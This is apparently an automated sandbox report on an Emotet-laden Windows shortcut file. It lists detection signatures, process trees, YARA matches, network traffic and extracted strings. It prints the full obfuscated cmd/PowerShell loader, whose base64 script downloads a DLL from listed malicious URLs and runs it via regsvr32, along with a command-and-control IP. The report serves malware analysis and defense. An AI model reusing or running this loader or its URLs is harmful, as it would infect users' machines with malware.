Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Details.lnk

Overview

General Information

Sample Name:Details.lnk
Analysis ID:632105
MD5:4915772035b89b1e023e94626dbd8da9
SHA1:8cf2652d3a1c37c488ced4f16a01a26f1e407087
SHA256:4aaa9741e3fb2a63803214bfacd8a5f6e61de3c78612666124f746cf13957912
Tags:lnk
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Suspicious powershell command line found
Machine Learning detection for sample
Suspicious command line found
Powershell drops PE file
Obfuscated command line found
Machine Learning detection for dropped file
Yara detected Obfuscated Powershell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • cmd.exe (PID: 6920 cmdline: C:\Windows\System32\cmd.exe" /v:on /c M6+PYc1Ovpprw628Rl1zIwgCkVUha+nmywj5pKbvwUCOuX5GbnEfV3pSZPoT4QlmtbO4K6aL||p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)} MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
    • conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6976 cmdline: powershell.exe -c "&{$HXG=[System.Text.Encoding]::ASCII;$ghT='ICBXcml0ZS1Ib3N0ICJYaHFJVSI7JFByb2dyZXNzUHJlZmVyZW5jZT0iU2lsZW50bHlDb250aW51ZSI7JGxpbmtzPSgiaHR0cDovL3d3dy5qc29uc2ludGwuY29tL1J4c0dnb1ZXejkvNEhGaTNaWll0bllndEVMZ0NIblovIiwiaHR0cDovL2NtZW50YXJ6LjV';$ufmV='2LnBsL3RoZW1lcy96YWxNa1RiLyIsImh0dHBzOi8vbmFraGFyaW5pdHdlYmhvc3RpbmcuY29tL0hTRFlLTjFYNUdMRi8iLCJodHRwOi8vbmNpYS5kb3Rob21lLmNvLmtyL3dwLWluY2x1ZGVzL2x1N0pialg4WEwxS2FELyIsImh0dHA6Ly9waWZmbC5jb20vcGlmZmwuY29tL2EvIiwiaHR0cDovL2RpZ2l0YWxraXRjaGVuLmpwL2ltYWdlcy9QVm4vIik7JHQ9Ilp0TUlqWXgiOyRkPSIkZW52OlRNUFwuLlwkdCI7bWtkaXIgLWZvcmNlICRkIHwgb3V0LW51bGw7Zm9yZWFjaCAoJHUgaW4gJGxpbmtzKSB7dHJ5IHtJV1IgJHUgLU91dEZpbGUgJGRcSUtkemZKdFFwai5CQ1A7UmVnc3ZyMzIuZXhlICIkZFxJS2R6Zkp0UXBqLkJDUCI7YnJlYWt9IGNhdGNoIHsgfX0=';$AHI=[System.Convert]::FromBase64String($ghT+$ufmV);$TcqkRL=$HXG.GetString($AHI); iex ($TcqkRL)}" MD5: 95000560239032BC68B4C2FDFCDEF913)
      • regsvr32.exe (PID: 6160 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\..\ZtMIjYx\IKdzfJtQpj.BCP MD5: D78B75FC68247E8A63ACBA846182740E)
        • regsvr32.exe (PID: 5916 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PZgVlkJBEGfsjmei\fJMgQrGs.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
  • svchost.exe (PID: 5040 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6004 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6356 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5592 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6636 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5240 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Details.lnkSUSP_PowerShell_Caret_Obfuscation_2Detects powershell keyword obfuscated with caretsFlorian Roth
  • 0x2b3:$r1: p^o^w^e^r^s^h^e^l^l
  • 0x2b3:$r2: p^o^w^e^r^s^h^e^l^l
Details.lnkJoeSecurity_ObfuscatedPowershellYara detected Obfuscated PowershellJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.472903307.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000004.00000002.702789437.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000003.00000002.472773711.0000000000AD0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000004.00000002.702594070.0000000002330000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Process Memory Space: powershell.exe PID: 6976INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0x13860:$b2: ::FromBase64String(
            • 0x13bbd:$b2: ::FromBase64String(
            • 0x145ee:$b2: ::FromBase64String(
            • 0x149c5:$b2: ::FromBase64String(
            • 0x14e06:$b2: ::FromBase64String(
            • 0x15163:$b2: ::FromBase64String(
            • 0x1558b:$b2: ::FromBase64String(
            • 0x15afe:$b2: ::FromBase64String(
            • 0x45ab9:$b2: ::FromBase64String(
            • 0x45e16:$b2: ::FromBase64String(
            • 0x46e7b:$b2: ::FromBase64String(
            • 0x471d6:$b2: ::FromBase64String(
            • 0x892d9:$b2: ::FromBase64String(
            • 0x8d130:$b2: ::FromBase64String(
            • 0x8ecff:$b2: ::FromBase64String(
            • 0x8f05c:$b2: ::FromBase64String(
            • 0x8f5ad:$b2: ::FromBase64String(
            • 0x8faa6:$b2: ::FromBase64String(
            • 0x10cfc4:$b2: ::FromBase64String(
            • 0x10d31f:$b2: ::FromBase64String(
            • 0x152141:$b2: ::FromBase64String(
            SourceRuleDescriptionAuthorStrings
            4.2.regsvr32.exe.2330000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              4.2.regsvr32.exe.2330000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                3.2.regsvr32.exe.ad0000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  3.2.regsvr32.exe.ad0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    No Sigma rule has matched
                    No Snort rule has matched

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: Details.lnkReversingLabs: Detection: 41%
                    Source: http://digitalkitchen.jp/images/PVn/Avira URL Cloud: Label: malware
                    Source: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/Avira URL Cloud: Label: malware
                    Source: http://piffl.com/piffl.com/a/ity.Avira URL Cloud: Label: malware
                    Source: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196:8080/URL Reputation: Label: malware
                    Source: http://piffl.com/piffl.com/a/Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196/6Avira URL Cloud: Label: malware
                    Source: https://nakharinitwebhosting.com/HSDYKN1X5GLF/Avira URL Cloud: Label: malware
                    Source: https://173.82.82.196/~Avira URL Cloud: Label: malware
                    Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPMetadefender: Detection: 31%Perma Link
                    Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPReversingLabs: Detection: 40%
                    Source: C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy)Metadefender: Detection: 31%Perma Link
                    Source: C:\Windows\System32\PZgVlkJBEGfsjmei\fJMgQrGs.dll (copy)ReversingLabs: Detection: 40%
                    Source: Details.lnkJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\ZtMIjYx\IKdzfJtQpj.BCPJoe Sandbox ML: detected
                    Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,

                    Networking

                    barindex
                    Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080
                    Source: Joe Sandbox ViewASN Name: MULTA-ASN1US MULTA-ASN1US
                    Source: Joe Sandbox ViewIP Address: 173.82.82.196 173.82.82.196
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 23 May 2022 07:54:31 GMTServer: ApacheX-Powered-By: PHP/5.6.40Cache-Control: no-cache, must-revalidatePragma: no-cacheExpires: Mon, 23 May 2022 07:54:31 GMTContent-Disposition: attachment; filename="cfZG95JbCmghhw3pnr3FF4ZwGl.dll"Content-Transfer-Encoding: binarySet-Cookie: 628b3db76983e=1653292471; expires=Mon, 23-May-2022 07:55:31 GMT; Max-Age=60; path=/Last-Modified: Mon, 23 May 2022 07:54:31 GMTContent-Length: 365056Vary: Accept-Encoding,User-AgentKeep-Alive: timeout=5, max=40Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 99 b3 07 38 dd d2 69 6b dd d2 69 6b dd d2 69 6b b2 a4 c3 6b 83 d2 69 6b b2 a4 f7 6b d7 d2 69 6b d4 aa fa 6b da d2 69 6b dd d2 68 6b 84 d2 69 6b b2 a4 c2 6b f6 d2 69 6b b2 a4 f2 6b dc d2 69 6b b2 a4 f3 6b dc d2 69 6b b2 a4 f4 6b dc d2 69 6b 52 69 63 68 dd d2 69 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 76 7b 87 62 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 0a 00 00 04 02 00 00 8a 03 00 00 00 00 00 80 35 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 05 00 00 04 00 00 f5 54 06 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 aa 02 00 84 00 00 00 04 a2 02 00 50 00 00 00 00 00 03 00 fc d1 02 00 00 f0 02 00 cc 0f 00 00 00 00 00 00 00 00 00 00 00 e0 05 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 02 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 8b 00 00 00 20 02 00 00 8c 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 37 00 00 00 b0 02 00 00 14 00 00 00 94 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 cc 0f 00 00 00 f0 02 00 00 10 00 00 00 a8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 fc d1 02 00 00 00 03 00 00 d2 02 00 00 b8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f2 06 00 00 00 e0 05 00 00 08 00 00 00 8a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$8ikikikkikkikkikhk
                    Source: global trafficHTTP traffic detected: GET /RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: www.jsonsintl.comConnection: Keep-Alive
                    Source: global trafficTCP traffic: 192.168.2.5:49788 -> 173.82.82.196:8080
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: unknownTCP traffic detected without corresponding DNS query: 173.82.82.196
                    Source: svchost.exe, 00000014.00000003.648339577.0000024B5DD67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                    Source: svchost.exe, 00000014.00000003.648339577.0000024B5DD67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify - Music and Podcasts","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"podcasts","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF","XboxCrossGenSetId":null,"XboxConsoleGenOptimized":null,"XboxConsoleGenCompatible":null},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2022-05-13T10:00:01.2192622Z||.||8adb3f26-c14b-4fc0-afb3-91b3c6daaa3f||1152921505694830749||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailab
                    Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmentarz.5v.pl/themes/zalMkTb/
                    Source: powershell.exe, 00000002.00000002.477465133.0000021B763F8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540268618.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.702423111.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.703085340.0000011187C61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.696586993.0000024B5DD00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: svchost.exe, 00000008.00000002.703085340.0000011187C61000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.696586993.0000024B5DD00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                    Source: regsvr32.exe, 00000004.00000003.540358165.0000000000A4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: regsvr32.exe, 00000004.00000003.540268618.0000000000A80000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000002.702423111.0000000000A80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab_
                    Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://digitalkitchen.jp/images/PVn/
                    Source: svchost.exe, 00000014.00000003.668681317.0000024B5DDB4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668725884.0000024B5DDBE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000003.668709851.0000024B5DDA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                    Source: powershell.exe, 00000002.00000002.474725434.0000021B5EFFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://jsonsintl.com
                    Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ncia.dothome.co.kr/wp-includes/lu7JbjX8XL1KaD/
                    Source: powershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://piffl.com/piffl.com/a/
                    Source: powershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://piffl.com/piffl.com/a/ity.
                    Source: svchost.exe, 00000008.00000002.702993385.0000011187C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
                    Source: svchost.exe, 00000008.00000002.702993385.0000011187C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration
                    Source: svchost.exe, 00000008.00000002.702993385.0000011187C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enu
                    Source: powershell.exe, 00000002.00000002.459120911.0000021B5E3F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000002.00000002.459456091.0000021B5E600000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000002.00000002.474725434.0000021B5EFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.474715646.0000021B5EFE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com
                    Source: powershell.exe, 00000002.00000002.474736175.0000021B5F008000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com/
                    Source: powershell.exe, 00000002.00000002.474898970.0000021B5F0D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.474715646.0000021B5EFE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.com/RxsGgoVWz9/4HFi3ZZYtnYgtELgCHnZ/
                    Source: powershell.exe, 00000002.00000002.474715646.0000021B5EFE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonsintl.comx
                    Source: regsvr32.exe, 00000004.00000002.702313746.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540310981.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/6
                    Source: regsvr32.exe, 00000004.00000002.702313746.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000004.00000003.540310981.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196/~
                    Source: regsvr32.exe, 00000004.00000003.540310981.0000000000A24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://173.82.82.196:8080/
                    Source: powershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000002.00000002.476866712.0000021B6E453000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
